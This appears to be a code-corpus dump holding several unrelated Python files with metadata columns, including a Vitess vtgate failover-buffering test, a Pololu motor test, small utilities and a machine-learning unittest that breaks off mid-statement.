# Copyright 2016, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""Test the vtgate master buffer.
During a master failover, vtgate should automatically buffer (stall) requests
for a configured time and retry them after the failover is over.
The test reproduces such a scenario as follows:
- two threads constantly execute a critical read respectively a write (UPDATE)
- vtctl PlannedReparentShard runs a master failover
- both threads should not see any error during despite the failover
"""
import logging
import Queue
import threading
import time
import unittest
import environment
import tablet
import utils
from mysql_flavor import mysql_flavor
KEYSPACE = 'ks1'
SHARD = '0'
SCHEMA = '''CREATE TABLE buffer(
id BIGINT NOT NULL,
msg VARCHAR(64) NOT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB'''
CRITICAL_READ_ROW_ID = 1
UPDATE_ROW_ID = 2
class AbstractVtgateThread(threading.Thread):
"""Thread which constantly executes a query on vtgate.
Implement the execute() method for the specific query.
"""
def __init__(self, vtgate, name, writable=False):
super(AbstractVtgateThread, self).__init__(name=name)
self.vtgate = vtgate
self.writable = writable
self.quit = False
# Number of queries successfully executed.
self.rpcs = 0
# Number of failed queries.
self.errors = 0
# Queue used to notify the main thread that this thread executed
# "self.notify_after_n_successful_rpcs" RPCs successfully.
# Then "True" will be put exactly once on the queue.
self.wait_for_notification = Queue.Queue(maxsize=1)
# notify_lock guards the two fields below.
self.notify_lock = threading.Lock()
# If 0, notifications are disabled.
self.notify_after_n_successful_rpcs = 0
# Number of RPCs at the time a notification was requested.
self.rpcs_so_far = 0
self.start()
def run(self):
with self.vtgate.create_connection() as conn:
c = conn.cursor(keyspace=KEYSPACE, shards=[SHARD], tablet_type='master',
writable=self.writable)
while not self.quit:
try:
self.execute(c)
self.rpcs += 1
# If notifications are requested, check if we already executed the
# required number of successful RPCs.
# Use >= instead of == because we can miss the exact point due to
# slow thread scheduling.
with self.notify_lock:
if (self.notify_after_n_successful_rpcs != 0 and
self.rpcs >= (self.notify_after_n_successful_rpcs +
self.rpcs_so_far)):
self.wait_for_notification.put(True)
self.notify_after_n_successful_rpcs = 0
except Exception as e: # pylint: disable=broad-except
self.errors += 1
logging.debug('thread: %s query failed: %s', self.name, str(e))
# Wait 10ms seconds between two attempts.
time.sleep(0.01)
def execute(self, cursor):
raise NotImplementedError('Child class needs to implement this')
def set_notify_after_n_successful_rpcs(self, n):
with self.notify_lock:
self.notify_after_n_successful_rpcs = n
self.rpcs_so_far = self.rpcs
def stop(self):
self.quit = True
class ReadThread(AbstractVtgateThread):
def __init__(self, vtgate):
super(ReadThread, self).__init__(vtgate, 'ReadThread')
def execute(self, cursor):
row_count = cursor.execute('SELECT * FROM buffer WHERE id = :id',
{'id': CRITICAL_READ_ROW_ID})
logging.debug('read returned %d row(s).', row_count)
class UpdateThread(AbstractVtgateThread):
def __init__(self, vtgate):
super(UpdateThread, self).__init__(vtgate, 'UpdateThread', writable=True)
# Number of executed UPDATE queries.
self.i = 0
self.commit_errors = 0
def execute(self, cursor):
cursor.begin()
row_count = cursor.execute('UPDATE buffer SET msg=:msg WHERE id = :id',
{'msg': 'update %d' % self.i,
'id': UPDATE_ROW_ID})
try:
cursor.commit()
except Exception as e: # pylint: disable=broad-except
self.commit_errors += 1
if self.commit_errors > 1:
raise
logging.debug('COMMIT failed. This is okay once because we do not support'
' buffering it. err: %s', str(e))
self.i += 1
logging.debug('UPDATE affected %d row(s).', row_count)
master = tablet.Tablet()
replica = tablet.Tablet()
all_tablets = [master, replica]
def setUpModule():
try:
environment.topo_server().setup()
setup_procs = [t.init_mysql() for t in all_tablets]
utils.Vtctld().start()
utils.wait_procs(setup_procs)
utils.run_vtctl(['CreateKeyspace', KEYSPACE])
# Start tablets.
db_name = 'vt_' + KEYSPACE
for t in all_tablets:
t.create_db(db_name)
master.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace=KEYSPACE, init_shard=SHARD,
tablet_index=0)
replica.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace=KEYSPACE, init_shard=SHARD,
tablet_index=1)
for t in all_tablets:
t.wait_for_vttablet_state('NOT_SERVING')
# Reparent to choose an initial master and enable replication.
utils.run_vtctl(['InitShardMaster', '-force', '%s/%s' % (KEYSPACE, SHARD),
master.tablet_alias])
# Create the schema.
utils.run_vtctl(['ApplySchema', '-sql=' + SCHEMA, KEYSPACE])
start_vtgate()
# Insert two rows for the later threads (critical read, update).
with utils.vtgate.write_transaction(keyspace=KEYSPACE, shards=[SHARD],
tablet_type='master') as tx:
tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
{'id': CRITICAL_READ_ROW_ID, 'msg': 'critical read'})
tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
{'id': UPDATE_ROW_ID, 'msg': 'update'})
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [t.teardown_mysql() for t in [master, replica]]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
for t in all_tablets:
t.remove_tree()
def start_vtgate():
utils.VtGate().start(extra_args=[
'-enable_vtgate_buffer',
# Long timeout in case failover is slow.
'-vtgate_buffer_window', '10m',
'-vtgate_buffer_max_failover_duration', '10m',
'-vtgate_buffer_min_time_between_failovers', '20m'],
tablets=all_tablets)
class TestBuffer(unittest.TestCase):
def setUp(self):
utils.vtgate.kill()
# Restart vtgate between each test or the feature
# --vtgate_buffer_min_time_between_failovers
# will ignore subsequent failovers.
start_vtgate()
def _test_buffer(self, reparent_func):
# Start both threads.
read_thread = ReadThread(utils.vtgate)
update_thread = UpdateThread(utils.vtgate)
try:
# Verify they got at least 2 RPCs through.
read_thread.set_notify_after_n_successful_rpcs(2)
update_thread.set_notify_after_n_successful_rpcs(2)
read_thread.wait_for_notification.get()
update_thread.wait_for_notification.get()
# Execute the failover.
read_thread.set_notify_after_n_successful_rpcs(10)
update_thread.set_notify_after_n_successful_rpcs(10)
reparent_func()
# Failover is done. Swap master and replica for the next test.
global master, replica
master, replica = replica, master
read_thread.wait_for_notification.get()
update_thread.wait_for_notification.get()
except:
# Something went wrong. Kill vtgate first to unblock any buffered requests
# which would further block the two threads.
utils.vtgate.kill()
raise
finally:
# Stop threads.
read_thread.stop()
update_thread.stop()
read_thread.join()
update_thread.join()
# Both threads must not see any error.
self.assertEqual(0, read_thread.errors)
self.assertEqual(0, update_thread.errors)
# At least one thread should have been buffered.
# TODO(mberlin): This may fail if a failover is too fast. Add retries then.
v = utils.vtgate.get_vars()
labels = '%s.%s' % (KEYSPACE, SHARD)
self.assertGreater(v['BufferRequestsInFlightMax'][labels], 0)
logging.debug('Failover was buffered for %d milliseconds.',
v['BufferFailoverDurationMs'][labels])
def test_buffer_planned_reparent(self):
def planned_reparent():
utils.run_vtctl(['PlannedReparentShard', '-keyspace_shard',
'%s/%s' % (KEYSPACE, SHARD),
'-new_master', replica.tablet_alias])
self._test_buffer(planned_reparent)
def test_buffer_external_reparent(self):
def external_reparent():
# Demote master.
master.mquery('', mysql_flavor().demote_master_commands())
if master.semi_sync_enabled():
master.set_semi_sync_enabled(master=False)
# Wait for replica to catch up to master.
utils.wait_for_replication_pos(master, replica)
# Promote replica to new master.
replica.mquery('', mysql_flavor().promote_slave_commands())
if replica.semi_sync_enabled():
replica.set_semi_sync_enabled(master=True)
old_master = master
new_master = replica
# Configure old master to use new master.
new_pos = mysql_flavor().master_position(new_master)
logging.debug('New master position: %s', str(new_pos))
# Use 'localhost' as hostname because Travis CI worker hostnames
# are too long for MySQL replication.
change_master_cmds = mysql_flavor().change_master_commands(
'localhost', new_master.mysql_port, new_pos)
old_master.mquery('', ['RESET SLAVE'] + change_master_cmds +
['START SLAVE'])
# Notify the new vttablet master about the reparent.
utils.run_vtctl(['TabletExternallyReparented', new_master.tablet_alias])
self._test_buffer(external_reparent)
if __name__ == '__main__':
utils.main()
| #!/usr/bin/env python
#
# Copyright 2016, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""Test the vtgate master buffer.
During a master failover, vtgate should automatically buffer (stall) requests
for a configured time and retry them after the failover is over.
The test reproduces such a scenario as follows:
- two threads constantly execute a critical read respectively a write (UPDATE)
- vtctl PlannedReparentShard runs a master failover
- both threads should not see any error during despite the failover
"""
import logging
import Queue
import threading
import time
import unittest
import environment
import tablet
import utils
from mysql_flavor import mysql_flavor
KEYSPACE = 'ks1'
SHARD = '0'
SCHEMA = '''CREATE TABLE buffer(
id BIGINT NOT NULL,
msg VARCHAR(64) NOT NULL,
PRIMARY KEY (id)
) ENGINE=InnoDB'''
CRITICAL_READ_ROW_ID = 1
UPDATE_ROW_ID = 2
class AbstractVtgateThread(threading.Thread):
"""Thread which constantly executes a query on vtgate.
Implement the execute() method for the specific query.
"""
def __init__(self, vtgate, name, writable=False):
super(AbstractVtgateThread, self).__init__(name=name)
self.vtgate = vtgate
self.writable = writable
self.quit = False
# Number of queries successfully executed.
self.rpcs = 0
# Number of failed queries.
self.errors = 0
# Queue used to notify the main thread that this thread executed
# "self.notify_after_n_successful_rpcs" RPCs successfully.
# Then "True" will be put exactly once on the queue.
self.wait_for_notification = Queue.Queue(maxsize=1)
# notify_lock guards the two fields below.
self.notify_lock = threading.Lock()
# If 0, notifications are disabled.
self.notify_after_n_successful_rpcs = 0
# Number of RPCs at the time a notification was requested.
self.rpcs_so_far = 0
self.start()
def run(self):
with self.vtgate.create_connection() as conn:
c = conn.cursor(keyspace=KEYSPACE, shards=[SHARD], tablet_type='master',
writable=self.writable)
while not self.quit:
try:
self.execute(c)
self.rpcs += 1
# If notifications are requested, check if we already executed the
# required number of successful RPCs.
# Use >= instead of == because we can miss the exact point due to
# slow thread scheduling.
with self.notify_lock:
if (self.notify_after_n_successful_rpcs != 0 and
self.rpcs >= (self.notify_after_n_successful_rpcs +
self.rpcs_so_far)):
self.wait_for_notification.put(True)
self.notify_after_n_successful_rpcs = 0
except Exception as e: # pylint: disable=broad-except
self.errors += 1
logging.debug('thread: %s query failed: %s', self.name, str(e))
# Wait 10ms seconds between two attempts.
time.sleep(0.01)
def execute(self, cursor):
raise NotImplementedError('Child class needs to implement this')
def set_notify_after_n_successful_rpcs(self, n):
with self.notify_lock:
self.notify_after_n_successful_rpcs = n
self.rpcs_so_far = self.rpcs
def stop(self):
self.quit = True
class ReadThread(AbstractVtgateThread):
def __init__(self, vtgate):
super(ReadThread, self).__init__(vtgate, 'ReadThread')
def execute(self, cursor):
row_count = cursor.execute('SELECT * FROM buffer WHERE id = :id',
{'id': CRITICAL_READ_ROW_ID})
logging.debug('read returned %d row(s).', row_count)
class UpdateThread(AbstractVtgateThread):
def __init__(self, vtgate):
super(UpdateThread, self).__init__(vtgate, 'UpdateThread', writable=True)
# Number of executed UPDATE queries.
self.i = 0
self.commit_errors = 0
def execute(self, cursor):
cursor.begin()
row_count = cursor.execute('UPDATE buffer SET msg=:msg WHERE id = :id',
{'msg': 'update %d' % self.i,
'id': UPDATE_ROW_ID})
try:
cursor.commit()
except Exception as e: # pylint: disable=broad-except
self.commit_errors += 1
if self.commit_errors > 1:
raise
logging.debug('COMMIT failed. This is okay once because we do not support'
' buffering it. err: %s', str(e))
self.i += 1
logging.debug('UPDATE affected %d row(s).', row_count)
master = tablet.Tablet()
replica = tablet.Tablet()
all_tablets = [master, replica]
def setUpModule():
try:
environment.topo_server().setup()
setup_procs = [t.init_mysql() for t in all_tablets]
utils.Vtctld().start()
utils.wait_procs(setup_procs)
utils.run_vtctl(['CreateKeyspace', KEYSPACE])
# Start tablets.
db_name = 'vt_' + KEYSPACE
for t in all_tablets:
t.create_db(db_name)
master.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace=KEYSPACE, init_shard=SHARD,
tablet_index=0)
replica.start_vttablet(wait_for_state=None,
init_tablet_type='replica',
init_keyspace=KEYSPACE, init_shard=SHARD,
tablet_index=1)
for t in all_tablets:
t.wait_for_vttablet_state('NOT_SERVING')
# Reparent to choose an initial master and enable replication.
utils.run_vtctl(['InitShardMaster', '-force', '%s/%s' % (KEYSPACE, SHARD),
master.tablet_alias])
# Create the schema.
utils.run_vtctl(['ApplySchema', '-sql=' + SCHEMA, KEYSPACE])
start_vtgate()
# Insert two rows for the later threads (critical read, update).
with utils.vtgate.write_transaction(keyspace=KEYSPACE, shards=[SHARD],
tablet_type='master') as tx:
tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
{'id': CRITICAL_READ_ROW_ID, 'msg': 'critical read'})
tx.execute('INSERT INTO buffer (id, msg) VALUES (:id, :msg)',
{'id': UPDATE_ROW_ID, 'msg': 'update'})
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [t.teardown_mysql() for t in [master, replica]]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
for t in all_tablets:
t.remove_tree()
def start_vtgate():
utils.VtGate().start(extra_args=[
'-enable_vtgate_buffer',
# Long timeout in case failover is slow.
'-vtgate_buffer_window', '10m',
'-vtgate_buffer_max_failover_duration', '10m',
'-vtgate_buffer_min_time_between_failovers', '20m'],
tablets=all_tablets)
class TestBuffer(unittest.TestCase):
def setUp(self):
utils.vtgate.kill()
# Restart vtgate between each test or the feature
# --vtgate_buffer_min_time_between_failovers
# will ignore subsequent failovers.
start_vtgate()
def _test_buffer(self, reparent_func):
# Start both threads.
read_thread = ReadThread(utils.vtgate)
update_thread = UpdateThread(utils.vtgate)
try:
# Verify they got at least 2 RPCs through.
read_thread.set_notify_after_n_successful_rpcs(2)
update_thread.set_notify_after_n_successful_rpcs(2)
read_thread.wait_for_notification.get()
update_thread.wait_for_notification.get()
# Execute the failover.
read_thread.set_notify_after_n_successful_rpcs(10)
update_thread.set_notify_after_n_successful_rpcs(10)
reparent_func()
# Failover is done. Swap master and replica for the next test.
global master, replica
master, replica = replica, master
read_thread.wait_for_notification.get()
update_thread.wait_for_notification.get()
except:
# Something went wrong. Kill vtgate first to unblock any buffered requests
# which would further block the two threads.
utils.vtgate.kill()
raise
finally:
# Stop threads.
read_thread.stop()
update_thread.stop()
read_thread.join()
update_thread.join()
# Both threads must not see any error.
self.assertEqual(0, read_thread.errors)
self.assertEqual(0, update_thread.errors)
# At least one thread should have been buffered.
# TODO(mberlin): This may fail if a failover is too fast. Add retries then.
v = utils.vtgate.get_vars()
labels = '%s.%s' % (KEYSPACE, SHARD)
self.assertGreater(v['BufferRequestsInFlightMax'][labels], 0)
logging.debug('Failover was buffered for %d milliseconds.',
v['BufferFailoverDurationMs'][labels])
def test_buffer_planned_reparent(self):
def planned_reparent():
utils.run_vtctl(['PlannedReparentShard', '-keyspace_shard',
'%s/%s' % (KEYSPACE, SHARD),
'-new_master', replica.tablet_alias])
self._test_buffer(planned_reparent)
def test_buffer_external_reparent(self):
def external_reparent():
# Demote master.
master.mquery('', mysql_flavor().demote_master_commands())
if master.semi_sync_enabled():
master.set_semi_sync_enabled(master=False)
# Wait for replica to catch up to master.
utils.wait_for_replication_pos(master, replica)
# Promote replica to new master.
replica.mquery('', mysql_flavor().promote_slave_commands())
if replica.semi_sync_enabled():
replica.set_semi_sync_enabled(master=True)
old_master = master
new_master = replica
# Configure old master to use new master.
new_pos = mysql_flavor().master_position(new_master)
logging.debug('New master position: %s', str(new_pos))
# Use 'localhost' as hostname because Travis CI worker hostnames
# are too long for MySQL replication.
change_master_cmds = mysql_flavor().change_master_commands(
'localhost', new_master.mysql_port, new_pos)
old_master.mquery('', ['RESET SLAVE'] + change_master_cmds +
['START SLAVE'])
# Notify the new vttablet master about the reparent.
utils.run_vtctl(['TabletExternallyReparented', new_master.tablet_alias])
self._test_buffer(external_reparent)
if __name__ == '__main__':
utils.main()
| en | 0.90521 | #!/usr/bin/env python # # Copyright 2016, Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. Test the vtgate master buffer. During a master failover, vtgate should automatically buffer (stall) requests for a configured time and retry them after the failover is over. The test reproduces such a scenario as follows: - two threads constantly execute a critical read respectively a write (UPDATE) - vtctl PlannedReparentShard runs a master failover - both threads should not see any error during despite the failover CREATE TABLE buffer( id BIGINT NOT NULL, msg VARCHAR(64) NOT NULL, PRIMARY KEY (id) ) ENGINE=InnoDB Thread which constantly executes a query on vtgate. Implement the execute() method for the specific query. # Number of queries successfully executed. # Number of failed queries. # Queue used to notify the main thread that this thread executed # "self.notify_after_n_successful_rpcs" RPCs successfully. # Then "True" will be put exactly once on the queue. # notify_lock guards the two fields below. # If 0, notifications are disabled. # Number of RPCs at the time a notification was requested. # If notifications are requested, check if we already executed the # required number of successful RPCs. # Use >= instead of == because we can miss the exact point due to # slow thread scheduling. # pylint: disable=broad-except # Wait 10ms seconds between two attempts. # Number of executed UPDATE queries. # pylint: disable=broad-except # Start tablets. # Reparent to choose an initial master and enable replication. # Create the schema. # Insert two rows for the later threads (critical read, update). # Long timeout in case failover is slow. # Restart vtgate between each test or the feature # --vtgate_buffer_min_time_between_failovers # will ignore subsequent failovers. # Start both threads. # Verify they got at least 2 RPCs through. # Execute the failover. # Failover is done. Swap master and replica for the next test. # Something went wrong. Kill vtgate first to unblock any buffered requests # which would further block the two threads. # Stop threads. # Both threads must not see any error. # At least one thread should have been buffered. # TODO(mberlin): This may fail if a failover is too fast. Add retries then. # Demote master. # Wait for replica to catch up to master. # Promote replica to new master. # Configure old master to use new master. # Use 'localhost' as hostname because Travis CI worker hostnames # are too long for MySQL replication. # Notify the new vttablet master about the reparent. | 2.320819 | 2 |
python/Message.py | ahaque/twitch-troll-detection | 107 | 6612382 | '''
Twitch Plays Pokemon, Machine Learns Twitch
@author: <NAME>
@date: April 2014
'''
class Message(object):
value = None
timestamp = None
username = None
def __init__(self, username, timestamp, value):
self.username = username
self.timestamp = timestamp
self.value = value | '''
Twitch Plays Pokemon, Machine Learns Twitch
@author: <NAME>
@date: April 2014
'''
class Message(object):
value = None
timestamp = None
username = None
def __init__(self, username, timestamp, value):
self.username = username
self.timestamp = timestamp
self.value = value | en | 0.594756 | Twitch Plays Pokemon, Machine Learns Twitch
@author: <NAME>
@date: April 2014 | 2.209249 | 2 |
Chapter1/C-1/21.py | GeorgeGkas/Data_Structures_and_Algorithms_in_Python | 1 | 6612383 | lines = []
while True:
try:
read_line = input()
lines.append(read_line)
except EOFError:
break
| lines = []
while True:
try:
read_line = input()
lines.append(read_line)
except EOFError:
break
| none | 1 | 2.638783 | 3 | |
DailyProgrammer/DP20140709B.py | DayGitH/Python-Challenges | 2 | 6612384 | """
[7/9/2014] Challenge #170 [Intermediate] Rummy Checker
https://www.reddit.com/r/dailyprogrammer/comments/2a9u0a/792014_challenge_170_intermediate_rummy_checker/
# [](#IntermediateIcon) _(Intermediate)_: Rummy Checker
[Rummy](http://en.wikipedia.org/wiki/Rummy) is another very common card game. This time, the aim of the game is to
match cards together into groups (**melds**) in your hand. You continually swap cards until you have such melds, at
which point if you have a valid hand you have won. Your hand contains 7 cards, and your hand will contain 2 melds - one
that is 3 long and one that is 4 long. A meld is either:
* 3 or 4 cards of the same rank and different suit (eg. 3 jacks or 4 nines) called a **set**
* 3 or 4 cards in the same suit but increasing rank - eg. Ace, Two, Three, Four of Hearts, called a **run**
Ace is played low - ie. before 2 rather than after king.
Your challenge today is as follows. You will be given a Rummy hand of 7 cards. You will then be given another card,
that you have the choice to pick up. The challenge is to tell whether picking up the card will win you the game or not
- ie. whether picking it up will give you a winning hand. You will also need to state which card it is being replaced
with.
## Input Description
First you will be given a comma separated list of 7 cards on one line, as so:
Two of Diamonds, Three of Diamonds, Four of Diamonds, Seven of Diamonds, Seven of Clubs, Seven of Hearts, Jack of
Hearts
Next, you will be given another (**new**) card on a new line, like so:
Five of Diamonds
## Output Description
If replacing a card in your hand with the new card will give you a winning hand, print which card in your hand is being
replaced to win, for example:
Swap the new card for the Jack of Hearts to win!
Because in that case, that would give you a run (Two, Three, Four, Five of Diamonds) and a set (Seven of Diamonds,
Clubs and Hearts). In the event that picking up the new card will do nothing, print:
No possible winning hand.
# Notes
You may want to re-use some code for your card and deck structure from your solution to [this
challenge](http://www.reddit.com/r/dailyprogrammer/comments/29zut0) where appropriate.
"""
def main():
pass
if __name__ == "__main__":
main()
| """
[7/9/2014] Challenge #170 [Intermediate] Rummy Checker
https://www.reddit.com/r/dailyprogrammer/comments/2a9u0a/792014_challenge_170_intermediate_rummy_checker/
# [](#IntermediateIcon) _(Intermediate)_: Rummy Checker
[Rummy](http://en.wikipedia.org/wiki/Rummy) is another very common card game. This time, the aim of the game is to
match cards together into groups (**melds**) in your hand. You continually swap cards until you have such melds, at
which point if you have a valid hand you have won. Your hand contains 7 cards, and your hand will contain 2 melds - one
that is 3 long and one that is 4 long. A meld is either:
* 3 or 4 cards of the same rank and different suit (eg. 3 jacks or 4 nines) called a **set**
* 3 or 4 cards in the same suit but increasing rank - eg. Ace, Two, Three, Four of Hearts, called a **run**
Ace is played low - ie. before 2 rather than after king.
Your challenge today is as follows. You will be given a Rummy hand of 7 cards. You will then be given another card,
that you have the choice to pick up. The challenge is to tell whether picking up the card will win you the game or not
- ie. whether picking it up will give you a winning hand. You will also need to state which card it is being replaced
with.
## Input Description
First you will be given a comma separated list of 7 cards on one line, as so:
Two of Diamonds, Three of Diamonds, Four of Diamonds, Seven of Diamonds, Seven of Clubs, Seven of Hearts, Jack of
Hearts
Next, you will be given another (**new**) card on a new line, like so:
Five of Diamonds
## Output Description
If replacing a card in your hand with the new card will give you a winning hand, print which card in your hand is being
replaced to win, for example:
Swap the new card for the Jack of Hearts to win!
Because in that case, that would give you a run (Two, Three, Four, Five of Diamonds) and a set (Seven of Diamonds,
Clubs and Hearts). In the event that picking up the new card will do nothing, print:
No possible winning hand.
# Notes
You may want to re-use some code for your card and deck structure from your solution to [this
challenge](http://www.reddit.com/r/dailyprogrammer/comments/29zut0) where appropriate.
"""
def main():
pass
if __name__ == "__main__":
main()
| en | 0.923233 | [7/9/2014] Challenge #170 [Intermediate] Rummy Checker https://www.reddit.com/r/dailyprogrammer/comments/2a9u0a/792014_challenge_170_intermediate_rummy_checker/ # [](#IntermediateIcon) _(Intermediate)_: Rummy Checker [Rummy](http://en.wikipedia.org/wiki/Rummy) is another very common card game. This time, the aim of the game is to match cards together into groups (**melds**) in your hand. You continually swap cards until you have such melds, at which point if you have a valid hand you have won. Your hand contains 7 cards, and your hand will contain 2 melds - one that is 3 long and one that is 4 long. A meld is either: * 3 or 4 cards of the same rank and different suit (eg. 3 jacks or 4 nines) called a **set** * 3 or 4 cards in the same suit but increasing rank - eg. Ace, Two, Three, Four of Hearts, called a **run** Ace is played low - ie. before 2 rather than after king. Your challenge today is as follows. You will be given a Rummy hand of 7 cards. You will then be given another card, that you have the choice to pick up. The challenge is to tell whether picking up the card will win you the game or not - ie. whether picking it up will give you a winning hand. You will also need to state which card it is being replaced with. ## Input Description First you will be given a comma separated list of 7 cards on one line, as so: Two of Diamonds, Three of Diamonds, Four of Diamonds, Seven of Diamonds, Seven of Clubs, Seven of Hearts, Jack of Hearts Next, you will be given another (**new**) card on a new line, like so: Five of Diamonds ## Output Description If replacing a card in your hand with the new card will give you a winning hand, print which card in your hand is being replaced to win, for example: Swap the new card for the Jack of Hearts to win! Because in that case, that would give you a run (Two, Three, Four, Five of Diamonds) and a set (Seven of Diamonds, Clubs and Hearts). In the event that picking up the new card will do nothing, print: No possible winning hand. # Notes You may want to re-use some code for your card and deck structure from your solution to [this challenge](http://www.reddit.com/r/dailyprogrammer/comments/29zut0) where appropriate. | 3.645839 | 4 |
bin/motorsTest.py | vcollak/AutoBot | 0 | 6612385 | <gh_stars>0
""" Tests the motors using the Pololu library
The script sends forward and backward command to both motors
This script can be found: https://github.com/pololu/drv8835-motor-driver-rpi
"""
from __future__ import print_function
import time
#change path to app so we can call the vehicle class and settings
import os.path, sys
splitPath = os.path.split(os.path.dirname(os.path.realpath(__file__)))
appPath = splitPath[0]
sys.path.append(appPath)
sys.path.append(appPath + "/modules")
sys.path.append(appPath + "/settings")
from pololu_drv8835_rpi import motors, MAX_SPEED
# Set up sequences of motor speeds.
test_forward_speeds = list(range(0, MAX_SPEED, 1)) + \
[MAX_SPEED] * 200 + list(range(MAX_SPEED, 0, -1)) + [0]
test_reverse_speeds = list(range(0, -MAX_SPEED, -1)) + \
[-MAX_SPEED] * 200 + list(range(-MAX_SPEED, 0, 1)) + [0]
try:
motors.setSpeeds(0, 0)
print("Motor 1 forward")
for s in test_forward_speeds:
motors.motor1.setSpeed(s)
motors.motor2.setSpeed(-s)
time.sleep(0.005)
print("Motor 1 reverse")
for s in test_reverse_speeds:
motors.motor1.setSpeed(s)
motors.motor2.setSpeed(-s)
time.sleep(0.005)
finally:
# Stop the motors, even if there is an exception
# or the user presses Ctrl+C to kill the process.
motors.setSpeeds(0, 0) | """ Tests the motors using the Pololu library
The script sends forward and backward command to both motors
This script can be found: https://github.com/pololu/drv8835-motor-driver-rpi
"""
from __future__ import print_function
import time
#change path to app so we can call the vehicle class and settings
import os.path, sys
splitPath = os.path.split(os.path.dirname(os.path.realpath(__file__)))
appPath = splitPath[0]
sys.path.append(appPath)
sys.path.append(appPath + "/modules")
sys.path.append(appPath + "/settings")
from pololu_drv8835_rpi import motors, MAX_SPEED
# Set up sequences of motor speeds.
test_forward_speeds = list(range(0, MAX_SPEED, 1)) + \
[MAX_SPEED] * 200 + list(range(MAX_SPEED, 0, -1)) + [0]
test_reverse_speeds = list(range(0, -MAX_SPEED, -1)) + \
[-MAX_SPEED] * 200 + list(range(-MAX_SPEED, 0, 1)) + [0]
try:
motors.setSpeeds(0, 0)
print("Motor 1 forward")
for s in test_forward_speeds:
motors.motor1.setSpeed(s)
motors.motor2.setSpeed(-s)
time.sleep(0.005)
print("Motor 1 reverse")
for s in test_reverse_speeds:
motors.motor1.setSpeed(s)
motors.motor2.setSpeed(-s)
time.sleep(0.005)
finally:
# Stop the motors, even if there is an exception
# or the user presses Ctrl+C to kill the process.
motors.setSpeeds(0, 0) | en | 0.838852 | Tests the motors using the Pololu library The script sends forward and backward command to both motors This script can be found: https://github.com/pololu/drv8835-motor-driver-rpi #change path to app so we can call the vehicle class and settings # Set up sequences of motor speeds. # Stop the motors, even if there is an exception # or the user presses Ctrl+C to kill the process. | 3.613243 | 4 |
problems/utils.py | JoshKarpel/Euler | 1 | 6612386 | <filename>problems/utils.py
import functools
def memoize(func):
"""Memoize a function by storing a dictionary of {inputs: outputs}."""
memo = {}
@functools.wraps(func)
def memoizer(*args):
try:
return memo[args]
except KeyError:
memo[args] = func(*args)
return memo[args]
return memoizer
| <filename>problems/utils.py
import functools
def memoize(func):
"""Memoize a function by storing a dictionary of {inputs: outputs}."""
memo = {}
@functools.wraps(func)
def memoizer(*args):
try:
return memo[args]
except KeyError:
memo[args] = func(*args)
return memo[args]
return memoizer
| en | 0.46563 | Memoize a function by storing a dictionary of {inputs: outputs}. | 3.18803 | 3 |
tests/__init__.py | ajcerejeira/auto-fmu | 1 | 6612387 | <gh_stars>1-10
"""Unit and integration tests for :py:mod:`autofmu`."""
| """Unit and integration tests for :py:mod:`autofmu`.""" | en | 0.380482 | Unit and integration tests for :py:mod:`autofmu`. | 1.2018 | 1 |
tests/test_problemTransformation.py | DSAAR/amorf | 13 | 6612388 | <gh_stars>10-100
import unittest
from amorf.problemTransformation import AutoEncoderRegression, SingleTargetMethod, _implements_SciKitLearn_API
import amorf.datasets as ds
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeCV
import numpy
class TestSingleTargetMethod(unittest.TestCase):
def setUp(self):
X, y = ds.EDM().get_numpy()
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(
X, y, test_size=0.1)
self.selectors = ['linear', 'kneighbors',
'adaboost', 'gradientboost', 'mlp', 'svr', 'xgb']
def test_correct_assignment(self):
for selector in self.selectors:
regressor = SingleTargetMethod(selector)
self.assertEqual(
regressor.MORegressor._estimator_type, 'regressor')
self.assertRaises(ValueError, SingleTargetMethod,
'nonexistent_selector')
self.assertEqual(SingleTargetMethod(
custom_regressor=RidgeCV()).MORegressor._estimator_type, 'regressor')
def test_false_assignment(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
with self.assertRaises(Warning):
SingleTargetMethod(custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod("selector", custom_regressor=invalid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod(valid_estimator)
with self.assertRaises(ValueError):
SingleTargetMethod(invalid_estimator)
def test_fit(self):
for selector in self.selectors:
regressor = SingleTargetMethod(selector)
self.assertEqual(regressor.fit(
self.X_train, self.y_train)._estimator_type, 'regressor')
def test_predict(self):
for selector in self.selectors:
result = SingleTargetMethod(selector).fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_custom_regressor(self):
valid_estimator = RidgeCV()
invalid_estimator = object()
stm = SingleTargetMethod(custom_regressor=valid_estimator)
self.assertFalse(_implements_SciKitLearn_API(
invalid_estimator))
self.assertTrue(_implements_SciKitLearn_API(
valid_estimator))
result = stm.fit(
self.X_train, self.y_train).predict(self.X_test)
self.assertEqual(
result.shape, (len(self.X_test), len(self.y_test[0, :])))
self.assertTrue(type(result) is numpy.ndarray)
self.assertTrue(result.dtype is numpy.dtype(
'float32') or result.dtype is numpy.dtype('float64'))
def test_score(self):
for selector in self.selectors:
result = SingleTargetMethod(selector).fit(
